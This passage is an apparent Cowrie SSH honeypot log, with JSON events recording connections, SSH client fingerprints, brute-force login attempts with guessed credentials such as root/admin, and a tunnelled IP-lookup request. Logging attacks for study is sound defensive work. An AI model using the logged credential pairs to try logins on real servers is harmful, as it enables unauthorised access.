-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-26T20:59:25.382741Z","src_ip":"212.227.235.229","session":"be62c37d2b65"}
{"eventid":"cowrie.session.closed","duration":"26.9","message":"Connection lost after 26.9 seconds","sensor":"my-vps","timestamp":"2025-08-26T20:59:25.994175Z","src_ip":"212.227.235.229","session":"63e879b1de20"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":46968,"dst_ip":"1.2.3.4","dst_port":22,"session":"8c70cb4b6e30","protocol":"ssh","message":"New connection: 212.227.235.229:46968 (1.2.3.4:22) [session: 8c70cb4b6e30]","sensor":"my-vps","timestamp":"2025-08-26T20:59:29.986110Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-26T20:59:30.044557Z","src_ip":"212.227.235.229","session":"8c70cb4b6e30"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-26T20:59:31.271973Z","src_ip":"212.227.235.229","session":"8c70cb4b6e30"}
{"eventid":"cowrie.login.success","username":"root","password":"root123","message":"login attempt [root/root123] succeeded","sensor":"my-vps","timestamp":"2025-08-26T20:59:35.454682Z","src_ip":"212.227.235.229","session":"be62c37d2b65"}
{"eventid":"cowrie.login.failed","username":"system","password":"OkwKcECs8qJP2Z","message":"login attempt [system/OkwKcECs8qJP2Z] failed","sensor":"my-vps","timestamp":"2025-08-26T20:59:38.143682Z","src_ip":"212.227.235.229","session":"8c70cb4b6e30"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"ip-who.com","dst_port":80,"src_ip":"212.227.235.229","src_port":0,"message":"direct-tcp connection request to ip-who.com:80 from :0","sensor":"my-vps","timestamp":"2025-08-26T20:59:38.521662Z","session":"be62c37d2b65"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"ip-who.com","dst_port":80,"data":"b'GET /json/ HTTP/1.1\\r\\nHost: ip-who.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to ip-who.com:80 with data b'GET /json/ HTTP/1.1\\r\\nHost: ip-who.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T20:59:38.802893Z","src_ip":"212.227.235.229","session":"be62c37d2b65"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":38320,"dst_ip":"1.2.3.4","dst_port":22,"session":"c7dd94e21212","protocol":"ssh","message":"New connection: 212.227.235.229:38320 (1.2.3.4:22) [session: c7dd94e21212]","sensor":"my-vps","timestamp":"2025-08-26T20:59:39.020509Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-26T20:59:39.021333Z","src_ip":"212.227.235.229","session":"c7dd94e21212"}
{"eventid":"cowrie.session.closed","duration":"9.8","message":"Connection lost after 9.8 seconds","sensor":"my-vps","timestamp":"2025-08-26T20:59:39.807485Z","src_ip":"212.227.235.229","session":"8c70cb4b6e30"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-26T20:59:40.060372Z","src_ip":"212.227.235.229","session":"c7dd94e21212"}
{"eventid":"cowrie.login.failed","username":"admin","password":"admin","message":"login attempt [admin/admin] failed","sensor":"my-vps","timestamp":"2025-08-26T20:59:42.505111Z","src_ip":"212.227.235.229","session":"c7dd94e21212"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":36614,"dst_ip":"1.2.3.4","dst_port":22,"session":"0264245aeb43","protocol":"ssh","message":"New connection: 212.227.235.229:36614 (1.2.3.4:22) [session: 0264245aeb43]","sensor":"my-vps","timestamp":"2025-08-26T20:59:43.353713Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-26T20:59:43.354798Z","src_ip":"212.227.235.229","session":"0264245aeb43"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-26T20:59:43.715263Z","src_ip":"212.227.235.229","session":"0264245aeb43"}
{"eventid":"cowrie.session.closed","duration":"21.9","message":"Connection lost after 21.9 seconds","sensor":"my-vps","timestamp":"2025-08-26T20:59:43.864328Z","src_ip":"212.227.235.229","session":"be62c37d2b65"}
{"eventid":"cowrie.session.closed","duration":"5.4","message":"Connection lost after 5.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T20:59:44.456701Z","src_ip":"212.227.235.229","session":"c7dd94e21212"}
{"eventid":"cowrie.login.success","username":"root","password":"admin","message":"login attempt [root/admin] succeeded","sensor":"my-vps","timestamp":"2025-08-26T20:59:48.344145Z","src_ip":"212.227.235.229","session":"0264245aeb43"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":60298,"dst_ip":"1.2.3.4","dst_port":22,"session":"1fd66846c94d","protocol":"ssh","message":"New connection: 217.72.205.35:60298 (1.2.3.4:22) [session: 1fd66846c94d]","sensor":"my-vps","timestamp":"2025-08-26T20:59:51.356561Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T20:59:51.357858Z","src_ip":"217.72.205.35","session":"1fd66846c94d"}
{"eventid":"cowrie.session.connect","src_ip":"45.88.8.215","src_port":51206,"dst_ip":"1.2.3.4","dst_port":22,"session":"2435e430ba1d","protocol":"ssh","message":"New connection: 45.88.8.215:51206 (1.2.3.4:22) [session: 2435e430ba1d]","sensor":"my-vps","timestamp":"2025-08-26T20:59:54.108643Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T20:59:54.916731Z","src_ip":"45.88.8.215","session":"2435e430ba1d"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T20:59:54.917434Z","src_ip":"45.88.8.215","session":"2435e430ba1d"}
{"eventid":"cowrie.login.success","username":"root","password":"Nishka@123","message":"login attempt [root/Nishka@123] succeeded","sensor":"my-vps","timestamp":"2025-08-26T20:59:56.485081Z","src_ip":"45.88.8.215","session":"2435e430ba1d"}
{"eventid":"cowrie.session.closed","duration":"3.1","message":"Connection lost after 3.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T20:59:57.218257Z","src_ip":"45.88.8.215","session":"2435e430ba1d"}
{"eventid":"cowrie.session.closed","duration":"20.7","message":"Connection lost after 20.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:00:04.005645Z","src_ip":"212.227.235.229","session":"0264245aeb43"}
{"eventid":"cowrie.login.failed","username":"guest","password":"guest","message":"login attempt [guest/guest] failed","sensor":"my-vps","timestamp":"2025-08-26T21:00:05.781038Z","src_ip":"212.227.235.229","session":"df0ec19f7050"}
{"eventid":"cowrie.session.closed","duration":"50.8","message":"Connection lost after 50.8 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:00:07.776739Z","src_ip":"212.227.235.229","session":"df0ec19f7050"}
{"eventid":"cowrie.session.closed","duration":"254.3","message":"Connection lost after 254.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:00:09.668149Z","src_ip":"212.227.235.229","session":"569032a4b16a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":51846,"dst_ip":"1.2.3.4","dst_port":22,"session":"66d246c48e11","protocol":"ssh","message":"New connection: 212.227.235.229:51846 (1.2.3.4:22) [session: 66d246c48e11]","sensor":"my-vps","timestamp":"2025-08-26T21:00:11.262653Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-26T21:00:11.284406Z","src_ip":"212.227.235.229","session":"66d246c48e11"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-26T21:00:11.526419Z","src_ip":"212.227.235.229","session":"66d246c48e11"}
{"eventid":"cowrie.login.failed","username":"admin","password":"admin@123","message":"login attempt [admin/admin@123] failed","sensor":"my-vps","timestamp":"2025-08-26T21:00:13.587548Z","src_ip":"212.227.235.229","session":"66d246c48e11"}
{"eventid":"cowrie.session.closed","duration":"3.9","message":"Connection lost after 3.9 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:00:15.136059Z","src_ip":"212.227.235.229","session":"66d246c48e11"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":59368,"dst_ip":"1.2.3.4","dst_port":22,"session":"dc179bbe1cca","protocol":"ssh","message":"New connection: 212.227.235.229:59368 (1.2.3.4:22) [session: dc179bbe1cca]","sensor":"my-vps","timestamp":"2025-08-26T21:00:34.224886Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-26T21:00:34.513063Z","src_ip":"212.227.235.229","session":"dc179bbe1cca"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-26T21:00:34.548707Z","src_ip":"212.227.235.229","session":"dc179bbe1cca"}
